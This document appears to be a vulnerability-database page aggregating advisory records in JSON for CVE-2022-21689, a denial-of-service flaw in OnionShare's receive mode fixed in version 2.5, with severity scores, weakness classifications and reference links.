              "criteria": "cpe:2.3:a:onionshare:onionshare:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3A7A46B-5812-492A-B66B-DC43A15A0A38",
              "versionEndExcluding": "2.5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network."
    },
    {
      "lang": "es",
      "value": "OnionShare es una herramienta de c\u00f3digo abierto que permite compartir archivos, alojar sitios web y chatear con amigos de forma segura y an\u00f3nima usando la red Tor. En las versiones afectadas, el modo de recepci\u00f3n limita las subidas concurrentes a 100 por segundo y bloquea otras subidas en el mismo segundo, lo que puede ser desencadenado por un simple script. Un adversario con acceso al modo de recepci\u00f3n puede bloquear la subida de archivos para otros. No se presenta forma de bloquear este ataque en el modo p\u00fablico debido a las propiedades de anonimato de la red Tor"
    }
  ],
  "id": "CVE-2022-21689",
  "lastModified": "2024-11-21T06:45:14.277",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2022-01-18T22:15:07.987",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes",
        "Third Party Advisory"
      ],
      "url": "https://github.com/onionshare/onionshare/releases/tag/v2.5"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes",
        "Third Party Advisory"
      ],
      "url": "https://github.com/onionshare/onionshare/releases/tag/v2.5"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-400"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

gsd-2022-21689

Vulnerability from gsd

Modified

2023-12-13 01:19

Details

Aliases

CVE-2022-21689

Aliases

CVE-2022-21689

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2022-21689",
    "description": "OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network.",
    "id": "GSD-2022-21689",
    "references": [
      "https://www.suse.com/security/cve/CVE-2022-21689.html"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2022-21689"
      ],
      "details": "OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network.",
      "id": "GSD-2022-21689",
      "modified": "2023-12-13T01:19:15.024487Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2022-21689",
        "STATE": "PUBLIC",
        "TITLE": "Denial of Service in Onionshare"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "onionshare",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "\u003c 2.5"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "onionshare"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network."
          }
        ]
      },
      "impact": {
        "cvss": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "CWE-400: Uncontrolled Resource Consumption"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/onionshare/onionshare/releases/tag/v2.5",
            "refsource": "MISC",
            "url": "https://github.com/onionshare/onionshare/releases/tag/v2.5"
          },
          {
            "name": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc",
            "refsource": "CONFIRM",
            "url": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-jh82-c5jw-pxpc",
        "discovery": "UNKNOWN"
      }
    },
    "gitlab.com": {
      "advisories": [
        {
          "affected_range": "\u003c2.5",
          "affected_versions": "All versions before 2.5",
          "cvss_v2": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "cwe_ids": [
            "CWE-1035",
            "CWE-400",
            "CWE-707",
            "CWE-937"
          ],
          "date": "2022-01-21",
          "description": "OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network.",
          "fixed_versions": [
            "2.5"
          ],
          "identifier": "CVE-2022-21689",
          "identifiers": [
            "GHSA-jh82-c5jw-pxpc",
            "CVE-2022-21689"
          ],
          "not_impacted": "All versions starting from 2.5",
          "package_slug": "pypi/onionshare-cli",
          "pubdate": "2022-01-21",
          "solution": "Upgrade to version 2.5 or above.",
          "title": "Uncontrolled Resource Consumption",
          "urls": [
            "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc",
            "https://nvd.nist.gov/vuln/detail/CVE-2022-21689",
            "https://github.com/onionshare/onionshare/releases/tag/v2.5",
            "https://github.com/advisories/GHSA-jh82-c5jw-pxpc"
          ],
          "uuid": "dcd03ad1-93ab-416e-849a-a87306f85f8f"
        }
      ]
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:onionshare:onionshare:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "2.5",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2022-21689"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "NVD-CWE-Other"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc",
              "refsource": "CONFIRM",
              "tags": [
                "Third Party Advisory"
              ],
              "url": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc"
            },
            {
              "name": "https://github.com/onionshare/onionshare/releases/tag/v2.5",
              "refsource": "MISC",
              "tags": [
                "Release Notes",
                "Third Party Advisory"
              ],
              "url": "https://github.com/onionshare/onionshare/releases/tag/v2.5"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      },
      "lastModifiedDate": "2023-07-24T13:53Z",
      "publishedDate": "2022-01-18T22:15Z"
    }
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2022-21689 (GCVE-0-2022-21689)

Vulnerability from cvelistv5

ghsa-jh82-c5jw-pxpc

Vulnerability from github

Description:

Technical description:

Impact:

Recommendation:

pysec-2022-40

Vulnerability from pysec

cnvd-2022-06473

Vulnerability from cnvd

fkie_cve-2022-21689

Vulnerability from fkie_nvd

gsd-2022-21689

Vulnerability from gsd

Tags

Sightings

Nomenclature